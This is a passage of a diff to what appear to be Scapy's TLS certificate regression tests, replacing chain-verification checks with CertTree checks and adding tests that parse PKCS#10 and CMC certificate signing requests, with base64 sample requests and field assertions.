-pL/QlwVKvOoYKAKQvVR4CSFx09F9HdkWsKlhPdAKACL8x3vLCWRFCztAgfd9fDL1 -mMpYjn0q7pBZc2T5NnReJaH1ZgUufzkVqSr7UIuOhWn0 ------END CERTIFICATE----- -""") -untrusted.close() - -assert Chain([], c0).verifyChainFromCAFile(tf, untrusted_file=utf) -assert Chain([], c0).verifyChainFromCAPath(tf_folder, untrusted_file=utf) - -= Clear files +CertTree([c1, c2]).verify(c0) +CertTree([c2]).verify(c1) try: - os.remove("./certs_test_ca/trusted") - os.remove("./certs_test_ca/untrusted") -except: + CertTree([c1]).verify(c0) + assert False +except ValueError: pass try: - os.rmdir("././certs_test_ca") -except: + CertTree([c2]).verify(c0) + assert False +except ValueError: pass -= Test __repr__ - -repr_str = Chain([], c0).__repr__() -assert repr_str == '__ /OU=Domain Control Validated/CN=*.tools.ietf.org [Not Self Signed]\n' = Test GeneralizedTime @@ -751,3 +674,434 @@ fd.write(b"-----END CERTIFICATE-----\n") fd.close() cert = Cert(filename) assert "2011" in cert.notBefore_str and "2046" in cert.notAfter_str + ++ CSR + += CSR class - Parse CSR in PKCS#10 format - Normal + +from scapy.layers.tls.cert import CSR + +csr = CSR(""" +-----BEGIN NEW CERTIFICATE REQUEST----- +MIIEEDCCAvgCAQAwIzEQMA4GA1UECgwHVGVzdE9yZzEPMA0GA1UEAwwGVGVzdENO +MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA7QfRs3mjYec2JJDiFJkA +Sq0hfCdWo9hbX75FfWAh2Pid4NsCu/8vsfHwezFoQehpzIJq7tXH6mip8fiIEtzA +3WsXq7AknJmoaSIGu/g85zoypgqUfKvvrsof6h8avg16unm/LiDe7GGUh135L61W +XjQRQZcb/J+e4NDe4vO1qKauviB8N29tarMgtWCN29xdP2MmWsKG7OdKoCkeCUBv +T8J6TwtOtgcnz88cg5TpNZd9DeloqQVO+Y6mB3F7Moup1RMzNNfvXX7VwJs19quH +QVvpGMqMdKvBOcFMWBzkp5yz8rz906Up6IMtJ5lebnZiM78qMASce09XXUoQeRa2 +yQIDAQABoIIBpjAcBgorBgEEAYI3DQIDMQ4WDDEwLjAuMjYxMDAuMjBCBgorBgEE +AYI3DQIBMTQwMh4mAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBUAGUAbQBwAGwAYQB0 +AGUeCABVAHMAZQByMEcGCSsGAQQBgjcVFDE6MDgCAQkMEERDMS5ET01BSU4uTE9D +QUwMFERPTUFJTlxBZG1pbmlzdHJhdG9yDAtjZXJ0cmVxLmV4ZTB0BgorBgEEAYI3 +DQICMWYwZAIBAR5cAE0AaQBjAHIAbwBzAG8AZgB0ACAARQBuAGgAYQBuAGMAZQBk +ACAAQwByAHkAcAB0AG8AZwByAGEAcABoAGkAYwAgAFAAcgBvAHYAaQBkAGUAcgAg +AHYAMQAuADADAQAwgYIGCSqGSIb3DQEJDjF1MHMwFwYJKwYBBAGCNxQCBAoeCABV +AHMAZQByMCkGA1UdJQQiMCAGCisGAQQBgjcKAwQGCCsGAQUFBwMEBggrBgEFBQcD +AjAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0OBBYEFHTYQp8vpznjtd/YUFReYLZ3KkGL +MA0GCSqGSIb3DQEBBQUAA4IBAQDB2DQqAlezF5kf5m7LQ46nacqmhi7UCKbAV4kV +REkBdOqLLac50rerzCbSLFD8py0dVtqzD8+ccsm/jmadIwIiGLy/4YLfFiSyA4CK +MiHpDb5iVCPlhA7uod9w0/tvtjDRvoipog1VA2B9GL2vDn2RAMa4BOnI2dM1OZdH +V7UC9kRspJrzO0wMl68VQU6t7cGi+jfxEO735OEfRGkRRUuBXq6azBswlelA4+Ha +997g/CwZmlIUB4D1vZrXZkIvLWybkGtlP369LePN91jUBJr2rDw4nyfulSZEDKwb +L8SaD6ZFk+ZchJPx0UhG13GHdUJZb2brHV+gYZRusX8LOauO +-----END NEW CERTIFICATE REQUEST----- +""") + +assert csr.verifySelf() +csr + +assert isinstance(csr.csr, PKCS10_CertificationRequest) +pkcs10 = csr.csr + +assert pkcs10.certificationRequestInfo.get_subject() == {'organizationName': 'TestOrg', 'commonName': 'TestCN'} + +assert pkcs10.certificationRequestInfo.attributes[0].type.oidname == 'OID_OS_VERSION' +assert pkcs10.certificationRequestInfo.attributes[0].values[0].value == b'10.0.26100.2' + +assert pkcs10.certificationRequestInfo.attributes[3].type.oidname == 'OID_ENROLLMENT_CSP_PROVIDER' +assert pkcs10.certificationRequestInfo.attributes[3].values[0].value.ProviderName.val.decode("utf-16be") == 'Microsoft Enhanced Cryptographic Provider v1.0' + +assert pkcs10.certificationRequestInfo.attributes[4].values[0].value.extensions[0].extnID.oidname == "ENROLL_CERTTYPE" +assert pkcs10.certificationRequestInfo.attributes[4].values[0].value.extensions[0].extnValue.Name.val == b'\x00U\x00s\x00e\x00r' + + += CSR class - Parse CSR in CMC format - Normal (sha1) + +from scapy.layers.tls.cert import CSR + +csr = CSR(""" +-----BEGIN NEW CERTIFICATE REQUEST----- +MIIGuwYJKoZIhvcNAQcCoIIGrDCCBqgCAQMxCzAJBgUrDgMCGgUAMIIFFQYIKwYB +BQUHDAKgggUHBIIFAzCCBP8wgdkwZgIBAgYKKwYBBAGCNwoKATFVMFMCAQAwAwIB +ATFJMEcGCSsGAQQBgjcVFDE6MDgCAQkMEERDMS5ET01BSU4uTE9DQUwMFERPTUFJ +TlxBZG1pbmlzdHJhdG9yDAtjZXJ0cmVxLmV4ZTBvAgEDBggrBgEFBQcHCDFgMF4C +AQAwAwIBATBUMBcGCSsGAQQBgjcUAgQKHggAVQBzAGUAcjApBgNVHSUEIjAgBgor +BgEEAYI3CgMEBggrBgEFBQcDBAYIKwYBBQUHAwIwDgYDVR0PAQH/BAQDAgWgMIIE +G6CCBBcCAQEwggQQMIIC+AIBADAjMRAwDgYDVQQKDAdUZXN0T3JnMQ8wDQYDVQQD +DAZUZXN0Q04wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDDmuBEjKaX +ETewhcD5qoa4Qx+6H7YWColwCukmf6Bg8lwq3nHXEXHZjBfZaLHcev1xEgKd25L9 +kZtMUYeMK/zxX2C0x5xbsJR18/sJ9GZ5YqzUhlGW8PaLaql6g2e+jpzd9m1kU+IK +3Wx/bwZ2TmMjZoikHPym4Kzieyimqty8FxU1fBNkcNopLxaFVlclprwXqrdHXALC +/OWZIzUNcjAaTnVU4qFx7Mb65ik4klVsRiO1nR1dVeJWbMa8gvUhcglsZyH/wRwD +lHwpYGY1LO27Z9baBJojraTr0z0YiOWj6BjWfRy9FsbI+sFwLzskaUbcjdvI+UmL +P7Nji0zGrksZAgMBAAGgggGmMBwGCisGAQQBgjcNAgMxDhYMMTAuMC4yNjEwMC4y +MEIGCisGAQQBgjcNAgExNDAyHiYAQwBlAHIAdABpAGYAaQBjAGEAdABlAFQAZQBt +AHAAbABhAHQAZR4IAFUAcwBlAHIwRwYJKwYBBAGCNxUUMTowOAIBCQwQREMxLkRP +TUFJTi5MT0NBTAwURE9NQUlOXEFkbWluaXN0cmF0b3IMC2NlcnRyZXEuZXhlMHQG +CisGAQQBgjcNAgIxZjBkAgEBHlwATQBpAGMAcgBvAHMAbwBmAHQAIABFAG4AaABh +AG4AYwBlAGQAIABDAHIAeQBwAHQAbwBnAHIAYQBwAGgAaQBjACAAUAByAG8AdgBp +AGQAZQByACAAdgAxAC4AMAMBADCBggYJKoZIhvcNAQkOMXUwczAXBgkrBgEEAYI3 +FAIECh4IAFUAcwBlAHIwKQYDVR0lBCIwIAYKKwYBBAGCNwoDBAYIKwYBBQUHAwQG +CCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDAdBgNVHQ4EFgQUJm+5vprbywwUFsNc +npQt/zP+3BEwDQYJKoZIhvcNAQEFBQADggEBAHbi+2oaM9oRugYC6lfmRJHOKJ62 +DP/A41KZEe+7tZfrLSeOra6hNg10LZCJXE3Sg8rzE26/ZU/raJjxNytHH4NuhyxV +gZddYbekxRMey3ou2qSbotRATWYVEt7eW3+eJxunpEiuAZ4+Q0l5OcoT2XY85m+V +0goQFs3VHDDhbiDdm2TFikNA6Soi0H3Fe9Fdy36N9ua7Z5EwPhNCkorVU4C+XA+u +qJu2P18+W2p0NjQz96QfmBB0QXc2b0bCRpcsuQG9T3h0S1nrWXKjoymJL4SZPZ3F +Za/zNAPTPHd4UlX3fC5vPV1tw/sGfqn5ICRiqbNFIRPixol0UJmP/t0IMoowADAA +MYIBezCCAXcCAQOAFCZvub6a28sMFBbDXJ6ULf8z/twRMAkGBSsOAwIaBQCgPjAX +BgkqhkiG9w0BCQMxCgYIKwYBBQUHDAIwIwYJKoZIhvcNAQkEMRYEFCYLXDzJ+xwT +oNgEnqjniydkGdJkMA0GCSqGSIb3DQEBAQUABIIBAHgMd4MCpLOlR+Z12ATKYfgc +EeA/npahMiXIC97vn24xRDz9gXvQAvw9mSrhwc3kHPF45fQ4eQcoyaYHIt2G93sf +5rF8g9qKsNkzqvpVHPD1CUImUBxW92n1NwYwdL711x22wehaabWxybS5L3BLdLqr +B86oxjQ582eGXqj4OncPesPBJud4AnD4ObZseDFk3sNfJmiz3e7BUkOhcfPgePZv +P4xCVfb5QBV4Jv6xem/0QxkpuQNyTrEK7g3qE0DZaOj97YEPOtqKeOcSddueTPjy +u7F+oKWjUdO6P903GzjyeI5D3pV3WPgkz2a2lzdB2+B1Zw4MyXvUpfeg9CkkbCs= +-----END NEW CERTIFICATE REQUEST----- +""") + +assert csr.verifySelf() + +assert isinstance(csr.csr, CMS_ContentInfo) +cms = csr.csr + +assert cms.content.signerInfos[0].version == 3 +assert cms.content.signerInfos[0].sid.sid == b'&o\xb9\xbe\x9a\xdb\xcb\x0c\x14\x16\xc3\\\x9e\x94-\xff3\xfe\xdc\x11' +assert cms.content.signerInfos[0].digestAlgorithm.algorithm.oidname == "sha1" +assert cms.content.signerInfos[0].signatureAlgorithm.algorithm.oidname == "rsaEncryption" + += CSR class - Parse CSR in CMC format - Normal (sha1) - Unpack and verify + +cms_engine = CMS_Engine([csr]) +pkidata = cms_engine.verify(cms) + +assert isinstance(pkidata, CMC_PKIData) + +assert len(pkidata.controlSequence) == 2 +assert pkidata.controlSequence[0].type.oidname == "OID_CMC_ADD_ATTRIBUTES" +assert pkidata.controlSequence[0].attrValues[0].value.pkiDataReference == 0 +assert pkidata.controlSequence[0].attrValues[0].value.certReferences == [1] +assert pkidata.controlSequence[0].attrValues[0].value.attributes[0].values[0].value.MachineName == b"DC1.DOMAIN.LOCAL" +assert pkidata.controlSequence[0].attrValues[0].value.attributes[0].values[0].value.UserName == b"DOMAIN\\Administrator" +assert pkidata.controlSequence[0].attrValues[0].value.attributes[0].values[0].value.ProcessName == b"certreq.exe" + +assert pkidata.controlSequence[1].type.oidname == "id-cmc-addExtensions" +assert isinstance(pkidata.controlSequence[1].attrValues[0].value.extensions[0].extensions[0].extnValue, X509_ExtCertificateTemplateName) +assert pkidata.controlSequence[1].attrValues[0].value.extensions[0].extensions[0].extnValue.Name == b'\x00U\x00s\x00e\x00r' +assert isinstance(pkidata.controlSequence[1].attrValues[0].value.extensions[0].extensions[1].extnValue, X509_ExtExtendedKeyUsage) +assert [x.oid.oidname for x in pkidata.controlSequence[1].attrValues[0].value.extensions[0].extensions[1].extnValue.extendedKeyUsage] == ['OID_EFS_CRYPTO', 'emailProtection', 'clientAuth'] +assert isinstance(pkidata.controlSequence[1].attrValues[0].value.extensions[0].extensions[2].extnValue, X509_ExtKeyUsage) +assert pkidata.controlSequence[1].attrValues[0].value.extensions[0].extensions[2].extnValue.keyUsage == "101" + +assert isinstance(pkidata.reqSequence[0], CMC_TaggedRequest) +certReqInfo = pkidata.reqSequence[0].request.certificationRequest.certificationRequestInfo +assert certReqInfo.version == 0 +assert certReqInfo.get_subject() == {'organizationName': 'TestOrg', 'commonName': 'TestCN'} +assert certReqInfo.get_subject_str() == '/O=TestOrg/CN=TestCN' + +assert certReqInfo.attributes[0].type.oidname == "OID_OS_VERSION" +assert certReqInfo.attributes[0].values[0].value == b'10.0.26100.2' + +assert certReqInfo.attributes[1].type.oidname == "OID_ENROLLMENT_NAME_VALUE_PAIR" +assert certReqInfo.attributes[1].values[0].value.Name.val.decode("utf-16be") == "CertificateTemplate" +assert certReqInfo.attributes[1].values[0].value.Value.val.decode("utf-16be") == "User" + +assert certReqInfo.attributes[2].values[0].value.MachineName == b'DC1.DOMAIN.LOCAL' +assert certReqInfo.attributes[2].values[0].value.UserName == b'DOMAIN\\Administrator' +assert certReqInfo.attributes[2].values[0].value.ProcessName == b'certreq.exe' + +assert certReqInfo.attributes[3].values[0].value.KeySpec == 1 +assert certReqInfo.attributes[3].values[0].value.ProviderName.val.decode("utf-16be") == 'Microsoft Enhanced Cryptographic Provider v1.0' + +assert certReqInfo.attributes[4].values[0].value.extensions[0].extnValue.Name == b"\x00U\x00s\x00e\x00r" +assert [x.oid.oidname for x in certReqInfo.attributes[4].values[0].value.extensions[1].extnValue.extendedKeyUsage] == ['OID_EFS_CRYPTO', 'emailProtection', 'clientAuth'] +assert isinstance(certReqInfo.attributes[4].values[0].value.extensions[3].extnValue, X509_ExtSubjectKeyIdentifier) +assert certReqInfo.attributes[4].values[0].value.extensions[3].extnValue.keyIdentifier == b'&o\xb9\xbe\x9a\xdb\xcb\x0c\x14\x16\xc3\\\x9e\x94-\xff3\xfe\xdc\x11' + += CSR class - Parse CSR in CMC format - Advanced (KeyAttestation + sha256) + +from scapy.layers.tls.cert import CSR + +csr = CSR(""" + -----BEGIN NEW CERTIFICATE REQUEST----- + MIIdrAYJKoZIhvcNAQcCoIIdnTCCHZkCAQMxDzANBglghkgBZQMEAgEFADCCG/IG + CCsGAQUFBwwCoIIb5ASCG+AwghvcMGUwYwIBAgYKKwYBBAGCNwoKATFSMFACAQAw + AwIBATFGMEQGCSsGAQQBgjcVFDE3MDUCAQUMEldLUzAxLkRPTUFJTi5MT0NBTAwN + RE9NQUlOXFdLUzAxJAwNdGFza2hvc3R3LmV4ZTCCG22gghtpAgEBMIIbYjCCGkoC + AQAwADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALBtO+wrGSWT7QVn + 6dfFxKs/Yy2PRXZTzfd6770wcCZNPT/NzaN2QqVVwm1LMLTwgiHJQR2iUW8mfYLu + uVWRBvNi5DVAaB7LwNQxfb1XjaoDz5mmopISJPwjSZWkBlTj3V243f78GnR4kxXj + Df8Aw8Soggi2ijlvYuBtmDK/lwLhxg9Q0o477yBsjZRWp0VrB/QFL612ajN7t3EF + sLwSovMws+a1dAJQnzQozCmTFUiiAJCfulvqqXo73Lf9piYldIR2PQ93vNLK7PEv + 1h6PkiBQnkHEp2WxY0fCx8+hr44o2+fnZ789zKtVU8Hl7tVn9l+m80nfX69rYZDO + XnvNd2cCAwEAAaCCGRswHAYKKwYBBAGCNw0CAzEOFgwxMC4wLjI2MjAwLjIwRAYJ + KwYBBAGCNxUUMTcwNQIBBQwSV0tTMDEuRE9NQUlOLkxPQ0FMDA1ET01BSU5cV0tT + MDEkDA10YXNraG9zdHcuZXhlMFMGCSsGAQQBgjcVGTFGHkQATQBpAGMAcgBvAHMA + bwBmAHQAIABQAGwAYQB0AGYAbwByAG0AIABDAHIAeQBwAHQAbwAgAFAAcgBvAHYA + aQBkAGUAcjBcBgorBgEEAYI3DQICMU4wTAIBAB5EAE0AaQBjAHIAbwBzAG8AZgB0 + ACAAUABsAGEAdABmAG8AcgBtACAAQwByAHkAcAB0AG8AIABQAHIAbwB2AGkAZABl + AHIDAQAwgbAGCSqGSIb3DQEJDjGBojCBnzA8BgkrBgEEAYI3FQcELzAtBiUrBgEE + AYI3FQjWsQSC2qUvhJmLPoL2iwyCzYNAa4bp+RyCq/F7AgFkAgEHMBMGA1UdJQQM + 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 + 